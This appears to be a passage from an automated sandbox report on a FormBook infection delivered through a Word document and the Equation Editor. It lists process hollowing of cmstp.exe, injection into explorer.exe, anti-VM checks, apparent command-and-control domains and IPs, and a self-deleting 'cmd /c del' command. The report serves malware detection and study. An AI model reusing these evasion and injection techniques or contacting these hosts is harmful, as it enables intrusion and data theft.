          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F900 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F9F0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010048 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010060 NtQuerySection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010078 NtResumeThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020110D0 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201010C NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011148 NtOpenThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020101D4 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FA20 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FA50 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FBE8 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F8CC NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011930 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200F938 NtWriteFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FE24 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FEA0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FF34 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FFFC NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC30 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02010C40 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC48 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FC90 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FD5C NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02011D80 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A85D0 NtCreateFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8680 NtReadFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8700 NtClose
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A87B0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A85CA NtCreateFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A86FA NtClose
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A87AA NtAllocateVirtualMemory
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Memory allocated: 76E90000 page execute and read and write
          Source: ashlyzx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ashlkyvc7592.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$O-5433ERE.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD883.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: title field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: author field not present or empty
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | OLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
          Source: Binary string: cmstp.pdb source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: ashlyzx[1].exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: ashlkyvc7592.exe.2.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.4.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.3.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.5.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.7.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.ashlkyvc7592.exe.60000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.9.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.2.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.ashlkyvc7592.exe.60000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_003412DD push esp; retn 002Dh 4_2_00341321
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_00343652 push esp; retn 002Dh 4_2_00343655
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B87C push eax; ret 5_2_0041B882
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B812 push eax; ret 5_2_0041B818
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B81B push eax; ret 5_2_0041B882
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004068A0 push es; retf 5_2_004068AF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0040697C push esi; ret 5_2_0040697D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00414406 push B75A778Ch; ret 5_2_0041440B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041CEBD push ebp; retf 5_2_0041CEBE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B7C5 push eax; ret 5_2_0041B818
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00414FF5 push ecx; ret 5_2_00414FF6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00415FFA push ecx; iretd 5_2_00416004
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABDFA1 push ecx; ret 5_2_00ABDFB4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201DFA1 push ecx; ret 7_2_0201DFB4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A4406 push B75A778Ch; ret 7_2_000A440B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB7C5 push eax; ret 7_2_000AB818
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB81B push eax; ret 7_2_000AB882
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB812 push eax; ret 7_2_000AB818
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AB87C push eax; ret 7_2_000AB882
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000968A0 push es; retf 7_2_000968AF
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A8913 push ds; retn 4797h 7_2_000A891D
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0009697C push esi; ret 7_2_0009697D
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000ACEBD push ebp; retf 7_2_000ACEBE
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A5FFA push ecx; iretd 7_2_000A6004
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000A4FF5 push ecx; ret 7_2_000A4FF6
          Source: initial sample | Static PE information: section name: .text entropy: 7.66317958598
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: ashlkyvc7592.exe PID: 1528, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: ashlkyvc7592.exe, 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 0000000000098604 second address: 000000000009860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 000000000009898E second address: 0000000000098994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 | Thread sleep time: -300000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe TID: 2672 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 2988 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004088C0 rdtsc 5_2_004088C0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process information queried: ProcessInformation
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp | Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_
          Source: explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.443682934.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000c.ex
          Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00AC26F8
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h] 7_2_020226F8
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exe | Domain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exe | Domain query: www.publicfigure.skin
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.184.102 80
          Source: C:\Windows\explorer.exe | Domain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exe | Domain query: www.1oavyx.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Queries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match (the same unpacked PE and memory sources as listed under Stealing of Sensitive Information above)

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
